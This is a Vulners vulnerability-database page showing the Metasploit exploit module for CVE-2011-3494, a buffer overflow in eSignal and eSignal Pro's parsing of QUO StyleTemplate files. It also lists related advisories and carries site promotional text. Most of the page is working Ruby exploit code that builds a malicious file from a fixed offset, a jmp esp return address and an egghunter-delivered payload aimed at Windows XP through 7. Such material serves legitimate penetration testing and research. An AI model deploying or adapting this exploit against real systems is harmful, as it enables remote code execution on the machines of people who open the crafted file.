Vulners
Lucene search
eSignal and eSignal Pro File Parsing Buffer Overflow in QUO
🗓️ 20 Sep 2011 17:39:53Reported by Luigi Auriemma, TecR0c <[email protected]>, mr_me <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 20 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2011-3494 | 20 Sep 201100:00 | – | circl |
 | Interactive Data eSignal Stack Buffer Overflow (CVE-2011-3494) | 26 Mar 201200:00 | – | checkpoint_advisories |
 | CVE-2011-3494 | 16 Sep 201114:00 | – | cve |
 | CVE-2011-3494 | 16 Sep 201114:00 | – | cvelist |
 | CVE-2011-3494 | 16 Sep 201114:28 | – | nvd |
 | eSignal Multiple Vulnerabilities | 16 Sep 201100:00 | – | openvas |
| eSignal Multiple Vulnerabilities | 16 Sep 201100:00 | – | openvas |
 | eSignal / eSignal Pro 10.6.2425.1208 Buffer Overflow | 29 Sep 201100:00 | – | packetstorm |
 | Heap overflow | 16 Sep 201114:28 | – | prion |
 | CVE-2011-3494 | 22 May 202509:57 | – | redhatcve |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'eSignal and eSignal Pro File Parsing Buffer Overflow in QUO',
'Description' => %q{
The software is unable to handle the "<StyleTemplate>" files (even those
original included in the program) like those with the registered
extensions QUO, SUM and POR. Successful exploitation of this
vulnerability may take up to several seconds due to the use of
egghunter. Also, DEP bypass is unlikely due to the limited space for
payload. This vulnerability affects versions 10.6.2425.1208 and earlier.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', # Original discovery
'TecR0c <tecr0c[at]tecninja.net>', # msf
'mr_me <steventhomasseeley[at]gmai.com>', # msf
],
'References' =>
[
[ 'CVE', '2011-3494' ],
[ 'OSVDB', '75456' ],
[ 'BID', '49600' ],
[ 'URL', 'http://aluigi.altervista.org/adv/esignal_1-adv.txt' ],
[ 'EDB', '17837' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00"
},
'Targets' =>
[
[
'Win XP SP3 / Windows Vista / Windows 7',
{
'Ret' => 0x7c206fef, # jmp esp MFC71.dll v10.6.2425.1208
'Offset' => 54
}
],
],
'Privileged' => false,
'DisclosureDate' => '2011-09-06',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.quo']),
])
end
def exploit
eggoptions =
{
:checksum => false,
:eggtag => 'eggz'
}
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
buffer = rand_text_alpha(target['Offset'])
buffer << [target.ret].pack('V')
buffer << rand_text_alpha_upper(4)
buffer << hunter
buffer << rand_text_alpha_upper(1500)
buffer << egg
file = "<StyleTemplate>\r\n"
file << "#{buffer}\r\n"
file << "</StyleTemplate>\r\n"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(file)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
10High risk
Vulners AI Score10
CVSS 210
EPSS0.77849